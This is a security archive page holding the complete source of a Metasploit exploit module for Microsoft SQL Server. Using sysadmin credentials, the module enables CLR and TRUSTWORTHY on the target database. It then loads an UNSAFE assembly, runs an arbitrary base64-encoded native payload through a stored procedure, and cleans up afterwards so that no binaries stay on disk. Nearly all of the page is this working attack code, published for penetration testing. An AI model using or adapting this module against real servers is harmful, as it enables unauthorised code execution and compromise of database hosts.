exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft SQL Server Clr Stored Procedure Payload Execution

Microsoft SQL Server Clr Stored Procedure Payload Execution
Posted Feb 18, 2017
Authored by OJ Reeves, Lee Christensen, Nathan Kirk | Site metasploit.com

This Metasploit module executes an arbitrary native payload on a Microsoft SQL server by loading a custom SQL CLR Assembly into the target SQL installation, and calling it directly with a base64-encoded payload. The module requires working credentials in order to connect directly to the MSSQL Server. This method requires the user to have sufficient privileges to install a custom SQL CRL DLL, and invoke the custom stored procedure that comes with it. This exploit does not leave any binaries on disk. Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).

tags | exploit, arbitrary
SHA-256 | fe2d879dbdd0c10aa7ac5b9f21f78eea25748d38856209e0eae44eec747be7d8

Microsoft SQL Server Clr Stored Procedure Payload Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::MSSQL

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Clr Stored Procedure Payload Execution',
'Description' => %q{
This module executes an arbitrary native payload on a Microsoft SQL
server by loading a custom SQL CLR Assembly into the target SQL
installation, and calling it directly with a base64-encoded payload.

The module requires working credentials in order to connect directly to the
MSSQL Server.

This method requires the user to have sufficient privileges to install a custom
SQL CRL DLL, and invoke the custom stored procedure that comes with it.

This exploit does not leave any binaries on disk.

Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).
},
'Author' =>
[
'Lee Christensen', # original idea/research
'Nathan Kirk', # extra research/blog post
'OJ Reeves' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 1999'
))

register_options(
[
OptString.new('DATABASE', [true, 'The database to load the CLR Assembly into.', 'master'])
])
end

def check
unless mssql_login_datastore(datastore['DATABASE'])
vprint_status('Invalid SQL Server credentials')
return Exploit::CheckCode::Detected
end

version = get_sql_version_string

unless version =~ /Server 20(05|08|12|14|16)/
vprint_status('Unsupported version of SQL Server')
return Exploit::CheckCode::Safe
end

if mssql_is_sysadmin
vprint_good "User #{datastore['USERNAME']} is a sysadmin"
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
ensure
disconnect
end

def get_sql_version_string
mssql_query("select @@version", false)[:rows].first[0]
end

def get_sql_architecture(sql_version_string)
if sql_version_string =~ /(64-bit|x64)/i
ARCH_X64
else
ARCH_X86
end
end

def get_exploit_version(sql_version_string)
# keeping it simple at this point.
if sql_version_string =~ /Server (2005|2008|2012)/
'v3.5'
else
# assume 2014/2016 at this point.
'v4.0'
end
end

def set_trustworthy(on)
mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
end

def is_trustworthy
# SQLi in MSF!! OMG!
result = mssql_query("SELECT CASE is_trustworthy_on WHEN 1 THEN 'ON' ELSE 'OFF' END FROM sys.databases WHERE name ='#{datastore['DATABASE']}'", false)
result[:rows][0] == 'ON'
end

def enable_clr(enable)
query = %Q^
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'clr enabled', #{enable ? 1 : 0};
RECONFIGURE;
^
mssql_query(query, false)
end

def is_clr_enabled
result = mssql_query("SELECT CASE value WHEN 1 THEN 'ON' ELSE 'OFF' END FROM sys.configurations WHERE name = 'clr enabled'", false)
result[:rows][0] == 'ON'
end

def exploit
unless mssql_login_datastore(datastore['DATABASE'])
fail_with(Failure::BadConfig, 'Unable to login with the given credentials')
end

unless mssql_is_sysadmin
fail_with(Failure::BadConfig, 'Specified user lacks sufficient permissions')
end

# This module will only support 'thread' for EXITFUNC
# Bad things happen to SQL otherwise!
unless datastore['EXITFUNC'] == 'thread'
print_warning("Setting EXITFUNC to 'thread' so we don't kill SQL Server")
datastore['EXITFUNC'] = 'thread'
end

sql_version = get_sql_version_string
vprint_status("Target SQL Version is:\n#{sql_version}")

sql_arch = get_sql_architecture(sql_version)
unless payload.arch.first == sql_arch
fail_with(Failure::BadConfig, "Target SQL server arch is #{sql_arch}, payload architecture is #{payload.arch.first}")
end

trustworthy = is_trustworthy
clr_enabled = is_clr_enabled

unless trustworthy
print_status('Database does not have TRUSTWORTHY setting on, enabling ...')
set_trustworthy(true)
end

unless clr_enabled
print_status('Database does not have CLR support enabled, enabling ...')
enable_clr(true)
end

exploit_version = get_exploit_version(sql_version)
print_status("Using version #{exploit_version} of the Payload Assembly")
exploit_file_path = ::File.join(Msf::Config.install_root, 'data',
'SqlClrPayload', exploit_version, 'SqlClrPayload.dll')
vprint_status("Using #{exploit_file_path}")

assembly = ::File.read(exploit_file_path)

# Convert the assembly to the required format for execution of the stored
# procedure to create the custom stored proc
hex_assembly = "0x#{assembly.unpack('H*')[0]}"
asm_name = Rex::Text.rand_text_alpha(rand(4) + 8)
query = "CREATE ASSEMBLY [#{asm_name}] AUTHORIZATION [dbo] FROM #{hex_assembly} WITH PERMISSION_SET = UNSAFE"

print_status('Adding custom payload assembly ...')
mssql_query(query, false)

proc_name = Rex::Text.rand_text_alpha(rand(4) + 8)
param_name = Rex::Text.rand_text_alpha(rand(4) + 8)
query = "CREATE PROCEDURE [dbo].[#{proc_name}](@#{param_name} AS NVARCHAR(MAX)) AS EXTERNAL NAME [#{asm_name}].[StoredProcedures].[ExecuteB64Payload]"

print_status('Exposing payload execution stored procedure ...')
mssql_query(query, false)

# Generate the base64 encoded payload
b64payload = Rex::Text.encode_base64(payload.encoded)
query = "EXEC [dbo].[#{proc_name}] '#{b64payload}'"
print_status('Executing the payload ...')
mssql_query(query, false)

print_status('Removing stored procedure ...')
mssql_query("DROP PROCEDURE [dbo].[#{proc_name}]", false)

print_status('Removing assembly ...')
mssql_query("DROP ASSEMBLY [#{asm_name}]", false)

unless clr_enabled
print_status('Restoring CLR setting ...')
enable_clr(false)
end

unless trustworthy
print_status('Restoring Trustworthy setting ...')
set_trustworthy(false)
end

ensure
disconnect
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    2 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close